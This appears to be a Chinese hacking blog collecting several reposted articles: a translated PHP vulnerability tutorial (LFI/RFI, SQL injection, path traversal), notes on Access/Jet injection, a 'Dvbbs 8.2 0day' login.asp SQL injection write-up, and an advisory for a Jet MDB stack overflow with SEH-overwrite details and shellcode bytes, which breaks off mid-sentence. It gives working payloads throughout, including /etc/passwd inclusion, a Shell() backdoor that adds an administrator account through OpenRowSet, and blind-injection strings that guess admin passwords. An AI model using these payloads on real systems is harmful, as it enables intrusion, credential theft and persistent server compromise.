樱花浪子'S BLOG

[翻译]php安全之谜(PHP Undergroud Security)

Wed, 29 Apr 2009 15:54:20 +0000

文章作者：Omnipresent
译文作者：riusksk(泉哥)
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

-[ 作者信息 ]-----------------------------------------------------------------------

标题: "PHP Undergroud Security"
作者: Omnipresent
邮箱: omnipresent@email.it - omni@playhack.net
主页: http://omni.playhack.net - http://www.playhack.net
日期: 2007-04-12

---------------------------------------------------------------------------------

-[ 译者信息 ]-----------------------------------------------------------------------

译者:riusksk(泉哥)

邮箱:riusksk@qq.com

主页: http://riusksk.blogbus.com

日期：2008-11-15

---------------------------------------------------------------------------------

-[ 摘要 ]---------------------------------------------------------------------

     0x00: 前言

     0x01: 关注全局变量
#           修补

     0x02: 文件包含

# 修补

     0x03: 跨站脚本
     0x04: SQL注入

          \_ 0x04a: 绕过登陆验证
          \_ 0x04b: 1 Query? No.. 2 one!（译注：不好翻译，还是保留原文吧！）

# 修补

     0x05: 文件遍历

# 修补
     0x05: 结论

---[ 0x00: 前言]

大家好!首先对我糟糕的英语表示抱歉,因为它不是我的母语.

在本教程中,我将会向大家介绍一些主要的php漏洞,以及如何发现、利用并修补它！

-----------------------------------------------------------------------------[/]

---[ 0x01: 关注全局变量]

在php中，你并不一定需要声明变量（这对程序员来说确实是件好事），当你必须使用它时它会“自动”创建的。你可能认为这是件不错的事，确实如此，但这只是偶而发生的事情。

众所周之，PHP经常要获取用户的输入值，并对其进行处理。假如我们在使用一个未声明过的变量时，就可能会引发web程序的安全问题。例如下面一段代码：

[...]

     if ($is_admin == 1) {
          //Yes, I'm the admin so call the Administration Pannel
          [...]
     } else {
          //No, I'm not the admin
          [...]
     }

上面的变量$is_admin ，我们在使用前并未声明过，那么我们是否可以绕过该变量（在bugged.php文件中）而访问未经授权的管理面板呢？答案是肯定，但我们该如何添加管理认证权限呢？其实很简单，比如：

http://remote_host/bugged.php?is_admin=1

---[ 修补 ]---
如何修补该漏洞呢？这很容易：在if语句前声明变量$is_admin 即可，代码如下：

$is_admin = 0;

[...]

     if ($is_admin == 1) {
          //Yes, I'm the admin so call the Administration Pannel（为真，则说明是管理员，因此被重定向管理界面）
          [...]
     } else {
          //No, I'm not the admin（为假，则不是管理员）
          [...]
     }

-----------------------------------------------------------------------------[/]

---[ 0x02: 文件包含]

-----[本地文件包含]

PHP是种杰出的语言，强大而简单；但是如果你不想在你的代码中出现安全问题，那么你就必须注意一下你的代码了。

在一些情况下，使用动态包含文件（部分路径名存在某个变量中）确实是件好事。让我们看一下下面的代码：

     include "/users/".$include_path.".php";
     [...]
?>

变量$include_path 在使用前并未进行任何声明，因此攻击者可以在该变量中输入恶意数据，使其包含其它文件（比如/etc/passwd..）。

用户通过修改URL中的$include_path 变量值可以很容易浏览其它文件。例如：

http://remote_host/bugged.php?include_path=../../../../etc/passwd%00

包含后的结果如下：

     include "/users/../../../../etc/passwd%00.php"
     [...]
?>

因此攻击者可以窃取到存在服务器上的所有密码。

- [ 注意 ] -

%00是一个NULL字符，用于“删除”PHP文件扩展名。如果省略掉NULL，将只会显示PHP文件的内容，因为包含文件的扩展名是PHP(include "/users/".$include_path.".PHP")

-------------------------------------------------------------------------------

-----[ 远程文件包含]

先看一下下面的代码：

     [...]

          include($_GET['pag']);

     [...]

?>

正如我们所看到的，变量$page 在使用前并未进行任何验证，因此恶意用户可以通过浏览器包含或者调用他的脚本，从而获得被害者电脑的访问权或者像上面说的一样——浏览文件。

例1（提权）：

http://remote_host/inc.php?pag=[Evil Script - our shell located on our server]
例2(浏览文件):

http://remote_host/inc.php?pag=/etc/passwd

---[ 修补 ]---

如何解决这种问题呢？验证输入值就可以了。用得最多的一个验证方法就是创建一个可访问页面的列表，如下：

[...]

     $pag = $_GET['pag'];

     $pages = array('index.php', 'alfa.php', 'beta.php', 'gamma.php');

          if(in_array($pag, $pages))
          {
               include($pag);
          {
               else
               {
               die("Hacking Attempt!");
               }

[...]

-----------------------------------------------------------------------------[/]

---[ 0x03: 跨站脚本]

你是否想知道一些关于XSS的资料呢？关于这方面的内容，我的朋友已经写了很多了，我想我没必要再做重复的工作了，具体可以看下面的链接：
     [+] "Cross-Site Scripting for Fun and Profit"
      http://www.playhack.net/view.php?type=1&id=18

     [+] "Applying XSS to Phishing Attacks"
      http://www.playhack.net/view.php?type=1&id=20

-----------------------------------------------------------------------------[/]

---[ 0x03: SQL 注入]

SQL注入，如名字所述：在一个存在漏洞的WEB程序中，你可以在请求语句中注入SQL语句。
-----------------------------------------------------------------------------[/]

------[ 0x04b 绕过登陆验证]

在举例之前，我们必须先知晓一些关于SQL的内容：

- (')  这是什么呢？对攻击者来说，这是一个SQL语法中的操作符，这在漏洞攻击中是非常重要的，它可以用于划分字符串…

- (#) 用于注释，'#'（没有分号），这在SQL语法中用于作注释用的。记住它，因为它非常实用和重要！

- (;) 这个符号在数据库中可以用于构造新的请求语句。呆会我们看一下用它来入侵的实际操作，先看一下下面的例子（绕过登陆验证--获取管理权限）：

     // login.php

     $nick = $_POST['nick'];
     $pass = $_POST['pass'];

     $link = mysql_connect('localhost', 'root', 'root') or die('Error: '.
          mysql_error());

     mysql_select_db("sql_inj", $link);

$query = mysql_query("SELECT * FROM sql_inj WHERE nick ='".$nick."' AND pass ='" .$pass. "'",
$link);

if (mysql_num_rows($query) == 0) {
echo "";
exit;
}

     $logged = 1;

     [...]

     //EoF

     ?>

虽然这段脚本代码非常简单，但是这在学习SQL注入时非常有用。正如我们所看到的，变量$nick和 $pass用于SQL请求时并未进行任何有效地验证，因此我们可以注入我们的SQL代码！看一下下面的请求语句：

"SELECT * FROM sql_inj WHERE nick ='".$nick."' AND pass ='" .$pass. "'"

What happends if we pass two variables tainted like these:

假如我们输入经恶意构造的这两个变量，那么将会发生什么事呢，例如：

$nick = 1' OR '1' = '1
$pass = 1' OR '1' = '1

The new query will be:

构成新的请求语句：

"SELECT * FROM sql_inj WHERE nick ='1 OR '1' = '1' AND pass ='1' OR '1' = '1'"

如果你已经知道了关于数据库中的表的知识，但还未弄清楚上面的语句，那么可以看看下面的解释，以帮助你理解它。

1 OR 1 = 1 ??

1或者1等于1？很明显的！那么谁是'sql_inj'表中的第一位用户呢？会是安装这一WEB程序的人吗？没错！就是管理员。

因此我们可以以管理员的身份登陆网站，这样我们就成为管理员了，酷吧！

我们也可以输入下列请求：

$nick = 1' OR '1' = '1' #
$pass = what_we_want_to_put

构成新一请求语句：
"SELECT * FROM sql_inj WHERE nick ='1 OR '1' = '1' # AND pass = what_we_want_to_put"

之前我们已经说过'#'是注释用的！现在我们重新构成新的请求语句：

"SELECT * FROM sql_inj WHERE nick ='1 OR '1' = '1'

现在我们又变成管理员了:D

------[ 0x04b: 1 Query? No.. 2 one! ]

通过SQL注入，我们可以通过修改请求语句，从而注入新的数据，更改用户资料，还可以做其它事……让我们看一下下面的源代码：

//email.php

[...]

$email = $_POST['email'];

[...]

$query = mysql_query("SELECT email, passwd, user_name FROM users WHERE email =
'".$email."'");
[...]

?>

在这里，变量$email 在使用前并未进行任何有效地验证，因此我们可以利用它了。比如通过输入像下面的变量值就可以很容易地更新数据库信息了：

$email = x'; UPDATE users SET email = 'omnipresent@email.it'
      WHERE email = 'admin@site.com ';

构造新的请求语句：

SELECT email, passwd, user_name FROM users
     WHERE email = ' x'; UPDATE users SET email = 'omnipresent@email.it'
     WHERE email = 'admin@site.com ';

这里攻击者可以修改 'users' 表，特别是管理员的邮箱，利用他的邮箱，我可以通过“忘记了密码？”这一链接，利用邮箱（这里是omnipresent@email.it）接收一封像下列内容的邮件，从而达到目的：

From: host@site.com
     To: omnipresent@email.it
     Subject: Login Password

     Ehy.. take it ;)

     Username: Admin
     Password: 12345

     Regards,
     Admin

---[ 修补 ]---
首先可以通过修改php.ini文件来修补脚本漏洞：

1. 在所有的' （单引号）， “ （双引号）， \ （反斜线）以及NULL前自动加上转义符——反斜线“\”
    -COOKIE
    -POST
    -GET

2. 在字符串前加上斜线‘/’

3. 将指定的字符转换为HTML实体

4.转义在mysql-query中使用的字符串

5. 可以到 www.php.net 查看更多的函数

(译注： www.php.net 是一个不错的PHP在线查询站点，我经常用它来查询PHP函数及其它相关资料。）

6. 验证用户提取的数据，例如：

    $user_id = (int)$_GET['user_id'];

    $user_id is always an integer and we can cast the input for securing
    our web applications.

变量$user_id 总为整数，这样就可以确保在WEB程序中输入数据的安全了。
-----------------------------------------------------------------------------[/]

---[ 0x05: 文件遍历]

遍历文件是一个十分危重的漏洞，下面简单讲解一下该漏洞。

无论在什么时候，当我们需要使用文件时都需要检查一下脚本中的文件名及其路径。

在大多情况下，文件名都是作为函数fopen()的参数来传输的，比如：

[...]

    $fp = fopen("/path/{$_GET['filename']}.txt", 'r');

[...]

?>

由于在这段脚本代码中'filename' 可被被远程用户修改破坏，这就造成了文件遍历漏洞。

在这种情况下，攻击者可以通过使用多个"../"来移动目录查看文件。

例如：

http://remote_host/path/bug.php?filename=../../../../path_of_another_file/file%00

NULL Byte (%00)在许多攻击中多用于截断字符串，以突破文件扩展名的限制。

---[ 修补 ]---

修补这一漏洞最好的方法就是使用basename()函数，例如：

    $clean = array();

    if (basename($_GET['filename']) == $_GET['filename'])
         {
              $clean['filename'] = $_GET['filename'];
         }
    else
         {

              [...]

         }

$fp = fopen("/path/{$clean['filename']}.txt", 'r');

?>

-----------------------------------------------------------------------------[/]

---[ 0x06: 结论 ]

这是"PHP Undergroud Security"的结尾了，希望本文对你打造php安全代码有所帮助！

有任何问题可发送邮件至 omnipresent@email.it 或者 omni@playhack.net 。
-----------------------------------------------------------------------------[/]

\=======================[EOF]============== ====== /

ACCESS高级注入

Wed, 04 Jun 2008 04:30:39 +0000

现在我们在脚本注入攻击的技术中,常用的手法分好多种,最普通的是利用子查询或者是Union联合查询来取得一些特殊表中的内容,比如Admin,Log表等等,这是一种纯粹的对数据库的攻击方式,而MSSQL Server的方法则更为多样和复杂,
当我们取得连接权限较高的注入点的时候,我们可以利用MSSQL Server本身所带的扩展来执行命令，或者是获取目录,读取文件与修改注册表;在低权用户的连接中，我们则可以试用差异备份,
或者干脆就是跑数据库等方式来实现对系统的直接攻击或者是间接的攻击.再则则是类似于Oracle\MySQL\DB2这些非MS直接支持的数据库关于他们,我们也有多种多样的攻击手法,执行命令,导出文件或读取文件等.
以上是一些我们针对常用数据库的攻击方式的大体总结,不难看出，其中最鸡肋的,要算是Access的数据库了.一来在Access中,无法直接获取数据库中的表名和字段名称,二来在Access中,我们能做的东西非常少,
再说也不支持多语句的SQL语法,和T-SQL的标准又有不少的区别,让人觉得Access数据库中仅有的Insert,Update,Select,Delte,Produce仅仅是对SQL语句的封装而已.所以,我们依旧需要对Access进行研究.
在这篇研究笔记中,我所参考的文章和资料,有部分来自nsfocus和xFocus早在2000-2002年的文档,另一篇则是SuperHei所发表的<关于Access的一些测试>,
大家可以在http://www.4ngel.net/安全天使安全小组的网站上查询到.OK,废话不要太多,我们继续研究.
我们可以去翻看微软在刚推出Windows 2000的时候曾经出现过几个非常大的脚本漏洞的漏洞公告，其中比如 cateloy_type.asp的远程注入漏洞和Msadscs.dll漏洞等都涉及了与现在的攻击手法或者是常用的利用方法极为不同的地方,
比如Catelog_type.asp的注入漏洞,它的代码中出现的问题是这样的:
"select * from cateloy where type='" & Requset("Type") & "'"
谁都能看明白这是一个非常低级的注入漏洞,直接将Type的值放入SQL语句中查询,并没有估计到用户的恶意输入.
如果换作现在,我们基本上只有拿来跑表份,幸好MS没设置类似PHP的gpc,否则我们将一事无成.但是我们可以查看这篇漏洞资料的利用方式,其中涉及到了一个SQL语句:
Select * from Sometable where somefield='|Select Shell("cmd.exe /c dir")|'
关于这个语句的介绍,是漏洞资料中所说的,Access允许用"|"来创建VBA函数,导致命令被执行,其实这只是Access内置的一个特殊函数而已,相类似的还有cudir和Command函数.具体的我们可以在Access中测试.测试的SQL语句如下:
Select Shell("cmd.exe /c dir c:\ > c:\kevin.txt")
回到C盘,我们果然看到了kevin.txt.说明语句执行成功了.
然后我们将其转到脚本中测试吧.编写如下的VBS脚本
Set Conn=Createobject("Adodb.Connection")
Conn.Open "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=kevins4t.mdb"
Set Rs=Conn.execute("Select Shell(""cmd.exe /c dir c:\ > c:\kevin.txt"")")
Msgbox Rs(0)
这一此出现的结果很出乎我们的意料,错误的原因是"表达式中的'Shell'函数未定义".现在我们需要安静下来喝杯咖啡然后思考为什么同样的语句在不同的执行者间会出现如此截然不同的问题.一个能正常执行,
而另外一个则是找不到函数.试想微软一定在其中的什么地方设置了一个开关,那么我们就去微软的知识库去了解一下.
在微软的一篇关于沙盒模式的文档中,我们了解到一些内容:
为了安全起见,MS在Jet引擎的Sp8中,设置了一个名为SandBoxMode的开关,这个开关是开启一些特殊函数在另外的执行者中执行的权限的.它的注册表位置在
HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Jet\4.0\Engine\SandBoxMode里,默认是2.微软关于这个键值的介绍为:0为在任何所有者中中都禁止起用安全设置,1为仅在允许的范围之内,
2则是必须是Access的模式下(这就是为什么我们能在Access中执行成功的原因.),3则是完全开启,连Access中也不支持.
那么好吧,我们来看看如果将值变为0将会怎样.
这次运行我们的VBS的时候,出现的情况是一组数字,再在C盘下查看文件,果然看到了我们的kevin.txt.很神奇吧.原来Access也是可以执行命令的,只是微软这家伙总是懒得说出来而已.但是如果在实际方面会怎样呢?
一.后门的设置
我们的运用将会很窄.真的,一来我们需要的权限很高,起码要到能改注册表的权限,默认是Admin和LocalSystem,二来是我们将如何修改注册表，远程吗?没门的.所以我们只好将其当作一个后门用.
只要我们修改了注册表的值,那么在普通的注入语句中,这是一个很不错的后门方式,最起码可以在外部执行一些小小的命令什么的.
比如我们在渗透某个站点的时候拿到了最高权限,并且修改了这个SandBoxMode,之后我们被管理员扫地出门了.那么,在首页的某个地方依旧存在这一个Select的注入点,这样最好,我们让服务器执行如下的SQL就行了.
InjectionURL' and 0<>(select shell("cmd.exe /c net user > c:\inetpub\wwwroot\kevins4t.txt"))%00
这样我们就可以一步一步的将重新服务器拿下.
二.远程攻击
这将是一个很有意思的话题.首先我们必须有修改注册表的权限,二是有修改注册表的条件,三是可以执行SandboxMode的环境,必须三样同时满足才行,到底是在什么情况下呢?
我们知道,我们平时在杂志上看到的文章,很多的无非就是在一个以Sa连接的InjectionURL中苦苦挣扎,一是执行命令,如果去掉了扩展或者是将扩展需要的DLL移走,我们将一无所用.那么聪明的你是否想到了方法?
我们知道,只有Sa的权限才有可能去打开另外一个Access的连接的,当我们满足了打开Access的条件的同时,我们也满足了修改注册表的条件和权限,因为MSSQL有一个名为xp_regwrite的扩展,它的作用是修改注册表的值.语法如下
exec maseter.dbo.xp_regwrite Root_Key,SubKey,Value_Type,Value
那我们只要将SandBoxMode修改为0或者1就成功了.然后则是MSSQL的OpenRowSet函数,它用于打开一个特殊的数据库或者连接到另一个数据库之中.当我们具备SysAdmin的权限的时候,我们就可以做到打开Jet引擎.那么我们只要连接到一个Access数据库中,
然后执行命令就可以了.但是关键的问题是如何寻找这个Access数据库.
关于这个问题我以前想了很多,一开始是想,利用目录便历来查询数据库的位置.但是这种方法成功率不会很高,有的时候我们碰到很多的站点都设置了非常好的权限,无法找到MDB数据库.这是最为烦恼的地方.
不过后来我想到了一些前人用过的方式,系统里本来就有2-3个现存的数据库嘛,何必费神的去找呢?它们的位置在%windir%\system32\ias \ias.mdb或者%windir%\system32\ias\dnary.mdb这样一来,我们有了执行宿主,就没什么好怕的了.执行一下我们所需要的命令吧
InjectionURL';Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\winnt\system32\ias\ias.mdb','select shell("net user kevin 1986 /ad")');--
这样,我们就执行了命令了.而且继承的是MSSQL的LocalService的System权限.

--------------------------------------------------------------------------------------------------------------------------------------------------------

用户表
SELECT Name FROM msysobjects WHERE Type = 1 and flags=0
所有表
SELECT Name FROM msysobjects WHERE Type = 1

判断版本：
SELECT NULL FROM MSysModules2 '97
SELECT NULL FROM MSysAccessObjects '97 2000
SELECT NULL FROM MSysAccessXML '2000 2002-2003
SELECT NULL FROM MSysAccessStorage '2002-2003 2007

SandBoxMode:
SandBoxMode的开关,这个开关是开启一些特殊函数在另外的执行者中执行的权限的.它的注册表位置在
HKEY_LOCAL_MACHINE\SoftWare\Microsoft\Jet\4.0\Engine\SandBoxMode里,默认是2.
微软关于这个键值的介绍为:0为在任何所有者中中都禁止起用安全设置,1为仅在允许的范围之内,
2则是必须是Access的模式下(这就是为什么我们能在Access中执行成功的原因.),3则是完全开启,连Access中也不支持.

执行命令：
Select Shell("cmd.exe /c dir c:\ > c:\kevin.txt")

读文件
SELECT * FROM [TEXT;DATABASE=c:\;HDR=NO;FMT=Delimited].[kevin.txt]

写文件：【不能在子查询和UNION查询中，实用价值不大】
SELECT "text to write" into [TEXT;DATABASE=c:\;HDR=NO;FMT=Delimited].[kevin1.txt]

当前路径：sandboxing enable
select curdir() from msysaccessobjects
select dir('c:\ ') from msysaccessobjects
select environ(1) from msysaccessobjects
select filedatetime('c:\boot.ini') from msysaccessobjects
select filelen('c:\boot.ini') from msysaccessobjects
select getattr('c:\ ') from msysaccessobjects
select shell('cmd.exe /c dir c:\ > c:\kevin.txt') from msysaccessobjects

跨文件查询：
SELECT * FROM dv_address IN 'D:\dailian\bbs\Dvbbs8.2.0_Ac\Data\IPaddress.mdb'

连接MSSQL:
SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=(local);UID=sa;PWD=2853wang; DATABASE=master].Information_Schema.Tables

参考资料：
http://www.tr4c3.com/SecDocs/ACCESS%20THROUGH%20ACCESS.pdf

Dvbbs8.2 access/sql 版login.asp远程sql注入漏洞

Sat, 31 May 2008 11:32:46 +0000

[0day]Dvbbs8.2 access/sql 版login.asp远程sql注入漏洞
漏洞描述：
中国应用最广泛的论坛程序，最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本。漏洞存在源程序 login.asp
Login.asp 程序在检查隐藏值user用户名的登陆时没有过滤特殊符号，导致可以利用sql注入方式猜解出论坛管理员及所有用户的密码或者执行其它高级的sql语句直接威胁到服务器安全。
漏洞等级：
高危
漏洞分析：

password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271
Login.asp 代码片段
复制内容到剪贴板
代码:
Rem ==========论坛登录函数=========
Rem 判断用户登录
Function ChkUserLogin(username,password,mobile,usercookies,ctype)
    Dim rsUser,article,userclass,titlepic
    Dim userhidden,lastip,UserLastLogin
    Dim GroupID,ClassSql,FoundGrade
    Dim regname,iMyUserInfo
    Dim sql,sqlstr,OLDuserhidden
    FoundGrade=False
    lastip=Dvbbs.UserTrueIP
    userhidden=request.form("userhidden")
    If userhidden <> "1" Then userhidden=2
    ChkUserLogin=false
    If mobile<>"" Then
       sqlstr=" Passport='"&mobile&"'"
    Else
       sqlstr=" UserName='"&username&"'"
    End If
    Sql="Select UserID,UserName,UserPassword,UserEmail,UserPost,UserTopic,UserSex,UserFace,UserWidth,UserHeight,JoinDate,LastLogin,lastlogin as cometime , LastLogin as activetime,UserLogins,Lockuser,Userclass,UserGroupID,UserGroup,userWealth,userEP,userCP,UserPower,UserBirthday,UserLastIP,UserDel,UserIsBest,UserHidden,UserMsg,IsChallenge,UserMobile,TitlePic,UserTitle,TruePassWord,UserToday,UserMoney,UserTicket,FollowMsgID,Vip_StarTime,Vip_EndTime,userid as boardid"
    Sql=Sql & " From [Dv_User] Where "&sqlstr&""
    set rsUser=Dvbbs.Execute(sql)
    If rsUser.eof and rsUser.bof Then
       'strString("本论坛不存在该用户名.@@@@0")
       ChkUserLogin=False
       Exit Function
    Else
       If rsUser("Lockuser") =1 Or rsUser("UserGroupID") =5 Then
           ChkUserLogin=False
           Exit Function
       Else
           If Trim(password)=Trim(rsUser("UserPassword")) Then
              ChkUserLogin=True
              Dvbbs.UserID=RsUser("UserID")
              RegName = RsUser("UserName")
              Article= RsUser("UserPost")
              UserLastLogin = RsUser("cometime")
              UserClass = RsUser("Userclass")
              GroupID = RsUser("userGroupID")
              OLDuserhidden=RsUser("UserHidden")
              TitlePic = RsUser("UserTitle")
              If Article < 0Then Article=0
              Set Dvbbs.UserSession=Dvbbs.RecordsetToxml(rsUser,"userinfo","xml")
               Dvbbs.UserSession.documentElement.selectSingleNode("userinfo/@cometime").text=Now()
           Dvbbs.UserSession.documentElement.selectSingleNode("userinfo/@activetime").text=DateAdd("s",-3600,Now())
              Dvbbs.UserSession.documentElement.selectSingleNode("userinfo/@boardid").text=0
           Dvbbs.UserSession.documentElement.selectSingleNode("userinfo").attributes.setNamedItem(Dvbbs.UserSession.createNode(2,"isuserpermissionall","")).text=Dvbbs.FoundUserPermission_All()
              If OLDuserhidden <> CLng(userhidden) Then
                  Dvbbs.UserSession.documentElement.selectSingleNode("userinfo/@userhidden").text=userhidden
                  Dvbbs.Execute("update Dv_user set userhidden="&userhidden&" where UserId=" & Dvbbs.UserID)
              End If
              Dim BS
              Set Bs=Dvbbs.GetBrowser()
              Dvbbs.UserSession.documentElement.appendChild(Bs.documentElement)
              If EnabledSession Then Session(Dvbbs.CacheName & "UserID")=Dvbbs.UserSession.xml
           Else
              If ajaxPro Then
                  strString("用户名或者密码不正确.@@@@0")
              End If
              ChkUserLogin=False
              Exit Function
           End If
       End If
    End If
漏洞利用：(access版)
由于使用验证码，该漏洞只能纯手工进行注入尝试，在用户登陆页面，用户名处构造sql语句
如：
判断
复制内容到剪贴板
代码:
Where’ and ‘1’=’1
where’ and ‘1’=’2
密码任意6位，输入验证码
根据返回信息，第一条显示用户名或密码错误第二条显示无此用户
猜解用户
复制内容到剪贴板
代码:
where' and 1=(select count(*) from dv_admin where left(username,1)='a') and '1'='1
where' and 1=(select count(*) from dv_admin where left(username,2)='ad') and '1'='1
……………………….
……………………
…………………….
猜解密码(md5加密)
复制内容到剪贴板
代码:
where' and 1=(select count(*) from dv_admin where left(password,1)='1') and '1'='1
where' and 1=(select count(*) from dv_admin where left(password,2)='15') and '1'='1
……………………
……………………
…………………..
简单测试官方sql版也存在漏洞，利用过程不写了

相关信息：
Dvbbs官方 http://www.dvbbs.net
漏洞分析及测试
由where首发
联系mail: hacker@126.com
补丁：
目前官方没有任何补丁，请等待升级补丁

微软OFF2003－mdb的文件解析栈溢出漏洞

Mon, 19 Nov 2007 00:51:39 +0000

樱花浪子PS：用工具翻译了一下，可能不太准
原文：
Microsoft Jet Engine MDB File Parsing Stack Overflow Vulnerability

by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net

Summary:

A remote code execute vulnerability exists in Microsoft Jet
Engine. A remote attacker who successfully exploit this vulnerability
can execute arbitrary code on the affected system.

Affected Software Versions:

Microsoft Office Access 2003 sp3 on Windows XP SP2(chinese)
(Other versions may also be affected)

Details:

When Microsoft Office Access parsing a MDB file, it will call the
Jet Engine (msjet40.dll) to parse it. See the attched file
"Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.mdb", it will cause a
stack overflow vulnerability finally in the following codes:

(C:\Windows\System32\msjet40.dll, version is 4.0.8618.0)

.text:1B0B72BB mov ecx, edx ; ecx=0x5200
.text:1B0B72BD mov esi, edi ; esi point
to the datas
.text:1B0B72BF mov ebp, ecx ; which
can be find in the mdb file
.text:1B0B72C1 lea edi, [esp+40h] ; edi point
to stack memory
.text:1B0B72C5 shr ecx, 2
.text:1B0B72C8 rep movsd ; stack overflow!!
.text:1B0B72CA mov ecx, ebp
.text:1B0B72CC mov eax, [eax+1]
.text:1B0B72CF and ecx, 3
.text:1B0B72D2 rep movsb

Debug Informations as follows£º

eax=05f5cb67 ebx=05e66458 ecx=00005200 edx=00005200 esi=05f5cd12
edi=0013db60
eip=1b0b72c5 esp=0013db20 ebp=00005200 iopl=0 nv up ei pl
nz ac pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000216
msjet40!Ordinal55+0x23cd8:
1b0b72c5 c1e902 shr ecx,2
0:000> u eip
msjet40!Ordinal55+0x23cd8:
1b0b72c5 c1e902 shr ecx,2
1b0b72c8 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
1b0b72ca 8bcd mov ecx,ebp
1b0b72cc 8b4001 mov eax,dword ptr [eax+1]
1b0b72cf 83e103 and ecx,3
1b0b72d2 f3a4 rep movs byte ptr es:[edi],byte ptr [esi]
1b0b72d4 8bb424d4000000 mov esi,dword ptr [esp+0D4h]
1b0b72db 8b4b28 mov ecx,dword ptr [ebx+28h]
0:000> db esi
05f5cd12 00 4f 00 53 00 7e 00 31-00 5c 00 56 00 42 00 41 .O.S.~.1.\.V.B.A
05f5cd22 00 5c 00 56 00 42 00 41-00 36 00 5c 00 56 00 42 .\.V.B.A.6.\.V.B
05f5cd32 00 45 00 36 00 2e 00 44-00 4c 00 4c 00 23 00 56 .E.6...D.L.L.#.V
05f5cd42 00 69 00 73 00 75 00 61-00 6c 00 20 00 42 00 61 .i.s.u.a.l. .B.a
05f5cd52 00 73 00 69 00 63 00 20-00 46 00 6f 00 72 00 20 .s.i.c. .F.o.r.
05f5cd62 00 41 00 70 00 70 00 6c-00 69 00 63 00 61 00 74 .A.p.p.l.i.c.a.t
05f5cd72 00 69 00 6f 00 6e 00 73-00 00 00 00 00 00 00 00 .i.o.n.s........
05f5cd82 00 00 00 00 00 12 01 2a-00 5c 00 47 00 7b 00 34 .......*.\.G.{.4
0:000> db edi
0013db60 09 00 00 00 01 00 00 00-18 00 00 00 9a 51 00 1b .............Q..
0013db70 86 ce 00 1b 00 c0 f5 05-02 00 00 00 e8 dc 13 00 ................
0013db80 22 7c 00 1b 0c 11 f4 05-e8 dc 13 00 c0 10 f4 05 "|..............
0013db90 3c cd 00 1b c0 10 f4 05-00 c0 f5 05 9c 78 e6 05 <............x..
0013dba0 e8 dc 13 00 05 10 92 7c-38 78 e6 05 eb cb 00 1b .......|8x......
0013dbb0 80 9f a4 05 b0 98 a4 05-01 00 00 00 f2 cb 00 1b ................
0013dbc0 9c 78 e6 05 e8 dc 13 00-4c dc 13 00 4c dc 13 00 .x......L...L...
0013dbd0 01 00 00 00 60 f3 00 1b-80 9f a4 05 02 00 00 00 ....`...........

The length of 0x5200 is enough to make us to write datas to the
address where the SEH handle pointer is, so that we can rewrite the
SEH handle. I use following address to jump to shellcode:

1B0D4C42 FF55 0C call dword ptr [ebp+C]

This address is also in msjet40.dll, so it can bypass the security
feature of SEH in Windows XP SP2, and [ebp+0Ch] happens to point to
the source data.

Debug Informations:

eax=00000000 ebx=00000000 ecx=1b0d4c42 edx=7c9237d8 esi=00000000
edi=00000000
eip=1b0d4c42 esp=0013d750 ebp=0013d770 iopl=0 nv up ei pl
zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000246
msjet40!Ordinal310+0x17e:
1b0d4c42 ff550c call dword ptr [ebp+0Ch]
ss:0023:0013d77c=0013e184
0:000> dd ebp
0013d770 0013d820 7c92378b 0013d838 0013e184
0013d780 0013d854 0013d80c 1b0d4c42 00140000
0013d790 0013d838 0013e184 7c957860 0013d838
0013d7a0 0013e184 0013d854 0013d80c 1b0d4c42
0013d7b0 00140000 0013d838 05f5f1b2 00000000
0013d7c0 00000000 05e66458 01000000 0013d774
0013d7d0 01c8281c 0013da04 7c92ee18 7c98d8a8
0013d7e0 ffffffff 7c98d886 7c969d18 04ba0000
0:000> db 0013e184
0013e184 75 06 74 04 42 4c 0d 1b-fc e8 44 00 00 00 8b 45 u.t.BL....D....E
0013e194 3c 8b 7c 05 78 01 ef 8b-4f 18 8b 5f 20 01 eb 49 <.|.x...O.._ ..I
0013e1a4 8b 34 8b 01 ee 31 c0 99-ac 84 c0 74 07 c1 ca 0d .4...1.....t....
0013e1b4 01 c2 eb f4 3b 54 24 04-75 e5 8b 5f 24 01 eb 66 ....;T$.u.._$..f
0013e1c4 8b 0c 4b 8b 5f 1c 01 eb-8b 1c 8b 01 eb 89 5c 24 ..K._.........\$
0013e1d4 04 c3 31 c0 64 8b 40 30-85 c0 78 0c 8b 40 0c 8b ..1.d. (at) 0..x (dot) . [email concealed]@..
0013e1e4 70 1c ad 8b 68 08 eb 09-8b 80 b0 00 00 00 8b 68 p...h..........h
0013e1f4 3c 5f 31 f6 60 56 89 f8-83 c0 7b 50 68 7e d8 e2 <_1.`V....{Ph~..

Content at [ebp+0c]£º

|75 06| + |74 04| + |42 4C 0D 1B| + |FC E8 44 00 ...

{JNZ 6} + {JZ 4} + 1B0D4C42h + shellcode

Related content in the attached file
"Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.mdb" is from the offset
0x3336 of beginning of the file.

Notice that because the vulnerability is in the Jet Engine, some
web space providers may also be affected, the attacker can upload the
.asp and .mdb file, and exploit it via the Server Object
"ADODB.Connection".

How to Reproduce:

Open the attached file
"Microsoft_Jet_Engine_MDB_File_Parsing_Exploit.mdb" with Office Access
2003 sp3 on Windows XP SP2, then "calc.exe" will be executed, please
do not use the exploit for attacking.

The attached file is at:

http://ruder.cdut.net/attach/MS_MDB_Vul/Microsoft_Jet_Engine_MDB_File_Pa
rsing_Exploit.rar

MD5 Hash:73243B8823C8DC2C88AE0529CA13C4C6

Vendor Response:

Microsoft replied me that they would not fix this vulnerability,
it looks like they will not acknowledge vulnerabilities which are from
.mdb file.

"You appear to be reporting an issue with a file type Microsoft
considers to be unsafe. Many programs, such as Internet Explorer and
Outlook, automatically block these files. For more information, please
